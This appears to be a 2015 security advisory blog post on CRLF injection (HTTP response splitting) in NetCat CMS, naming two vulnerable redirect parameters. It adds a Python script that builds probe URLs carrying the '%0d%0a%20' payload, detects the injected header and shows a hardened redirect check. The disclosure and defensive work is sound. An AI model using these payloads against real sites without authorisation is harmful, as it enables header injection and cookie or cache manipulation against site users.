<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 5.01, 3.12, 3.0, 2.4, 2.3, 2.2, 2.1, 2.0, 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: March 07, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: March 07, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 119342, 119343</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Author: <span style="background-color: white;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/574207452729622528">@justqdjing</a>)</span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Advisory Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">5.01, 3.12, 3.0, 2.4, 2.3, 2.2, 2.1, 2.0, 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be downloaded from:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is a Russian company. "NetCat is designed to build the great majority of site types: from a simple "business card" site with minimal content to complex web-based systems, from corporate sites to online stores, libraries or media archives; in other words, projects of completely different kinds and at any level of complexity. Examples of sites running on NetCat CMS can be viewed in a special section."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Even an inexperienced user can manage a site built on NetCat, because it requires no knowledge of Internet technologies, programming or markup languages. NetCat is constantly being improved and gains new features. When finalizing them we take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and freelance web developers have chosen NetCat for their projects, and as of 2013 more than 18,000 sites had been created that run successfully on our CMS."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The NetCat web application is vulnerable to HTTP response splitting (CRLF injection). User-supplied input is copied into an HTTP response header without removing carriage return and line feed characters, so a remote attacker can terminate the header early and append arbitrary header lines to the response the server sends to the client. If the application does not filter such input, the injected headers can be used to set cookies, alter caching behaviour, or otherwise manipulate what the client receives.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Similar 0-day vulnerabilities in other products have been found by other researchers before, and NetCat has patched some of those reported in its own product. CXSECurity is a large collection of information on data communications security. Its main objective is to report errors in various applications; it also publishes advisories, suggested fixes and solution details for CRLF vulnerabilities, and cyber-intelligence recommendations.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The first flaw is in the "/post.php" page: the "redirect_url" parameter is written into a response header, and appending the encoded CR LF SP sequence "%0d%0a%20" followed by attacker-chosen text to its value injects a new header line.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> The second flaw is in the "/redirect.php" page: the "url" parameter is written into a response header in the same way, and appending "%0d%0a%20" followed by attacker-chosen text to its value injects a new header line.</span></div>
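<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The following is an added example, not NetCat's code and not part of the original advisory. It builds the probe request for the two parameters above, checks a captured response for the injected line, and shows the input check that closes the hole. The target host, the marker header name and the sample response are constructed for the example. One caveat the payload depends on: CR LF followed by a space or tab is a header line continuation (obs-fold) in HTTP/1.1, so a strict parser appends the injected text to the Location header instead of reading it as a separate header, while filters that only reject a bare CR LF, and lenient clients, do not; the checker reports both readings.</span></div>

```python
"""Added example (not NetCat's code): probe URLs for the two parameters named
in the advisory, a response check that tells a folded line from a separate
header, and the hardened redirect check.  Host, marker header name and the
sample response are constructed for this example."""
import re
import urllib.parse

MARKER_NAME = "X-Crlf-Probe"      # assumed marker header, unused by the application
MARKER_VALUE = "injected"

# Vulnerable page / parameter pairs from advisory items (2.1) and (2.2).
TARGETS = [("/post.php", "redirect_url"), ("/redirect.php", "url")]


def build_probe_url(base, path, param, redirect="http://example.com/"):
    """Append CR LF SP (the advisory's %0d%0a%20) and a marker header to the
    redirect value.  quote() with safe='' percent-encodes the control bytes,
    so the query string carries the literal %0D%0A%20 sequence."""
    payload = f"{redirect}\r\n {MARKER_NAME}: {MARKER_VALUE}"
    return f"{base}{path}?{param}={urllib.parse.quote(payload, safe='')}"


def parse_headers(raw, fold_continuations):
    """Parse the header block of a raw HTTP/1.1 response into (name, value)
    pairs.  With fold_continuations=True a line starting with SP or HTAB is
    obs-fold (RFC 7230 section 3.2.4) and is appended to the previous header;
    with False every line is read as its own header, as lenient clients and
    some proxies do."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        if fold_continuations and line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, f"{value} {line.strip()}")
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return headers


def check_injection(raw):
    """Report whether the marker became its own header under a lenient parse
    and which header swallows it under strict folding (None if none does)."""
    lenient = parse_headers(raw, fold_continuations=False)
    strict = parse_headers(raw, fold_continuations=True)
    separate = any(n.lower() == MARKER_NAME.lower() for n, _ in lenient)
    folded_into = next((n for n, v in strict if MARKER_NAME in v), None)
    return {"separate_header": separate, "folded_into": folded_into}


_CTL = re.compile(r"[\x00-\x1f\x7f]")


def safe_redirect_target(value, allowed_hosts):
    """Hardened redirect handling: reject any control character (CR, LF,
    NUL, ...) outright, then allow only a local path or an absolute http(s)
    URL whose host is on the allow-list.  Raises ValueError otherwise."""
    if _CTL.search(value):
        raise ValueError("control character in redirect target")
    parts = urllib.parse.urlsplit(value)
    local_path = value.startswith("/") and not value.startswith("//")
    if not parts.scheme and not parts.netloc and local_path:
        return value
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return value
    raise ValueError("redirect target not allowed")


# Constructed response, as a server that copies the payload into Location
# unfiltered would emit it.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: constructed-sample\r\n"
    b"Location: http://example.com/\r\n"
    b" X-Crlf-Probe: injected\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for path, param in TARGETS:
        print(build_probe_url("http://target.example", path, param))
    print(check_injection(SAMPLE_RESPONSE))
```

<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Run the script to print the two probe URLs and the verdict for the sample response; to test a live host, send the probe with any HTTP client that returns the raw header bytes and pass them to check_injection. A result of separate_header=True means a lenient consumer would act on the injected header; folded_into="Location" means a strict one only sees a corrupted redirect target. The fix is the safe_redirect_target pattern: refuse control characters before the value reaches any header, and restrict where a redirect may point.</span></div>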
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>References:</b><br /><a href="http://www.osvdb.org/show/osvdb/119342">http://www.osvdb.org/show/osvdb/119342</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.osvdb.org/show/osvdb/119343"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.osvdb.org/show/osvdb/119343</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/03/07/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/03/07/3</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Mar/36"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Mar/36</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=142576233403004&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142576233403004&w=4</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html</span></a></div>
<div style="margin: 0px;">
<a href="http://essayjeans.blog.163.com/blog/static/23717307420155142423197/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/23717307420155142423197/</span></a></div>
<div style="margin: 0px;">
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/bugs/netcat-cms-crlf</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551423749286/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551423749286/</span></a></div>
<div style="margin: 0px;">
<a href="https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/</span></a></div>
<div style="margin: 0px;">
<a href="https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-re</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms</span></a></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-46247779113746114202015-06-13T23:12:00.000-07:002015-06-13T23:12:30.884-07:00 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHifEFetS5cei5AkN_legTOD9aTKXSBU5OBWEJoiS_2bI5wazCOYKkEFxmEhWItitvfmxXeMsrffhBd1rnYFu3BUVMWA6_549aCepIde7j_DSrUnlIP6hn9p8soTs0ZMrpq_5gqTKax0c/s1600/6kbbs_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHifEFetS5cei5AkN_legTOD9aTKXSBU5OBWEJoiS_2bI5wazCOYKkEFxmEhWItitvfmxXeMsrffhBd1rnYFu3BUVMWA6_549aCepIde7j_DSrUnlIP6hn9p8soTs0ZMrpq_5gqTKax0c/s400/6kbbs_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
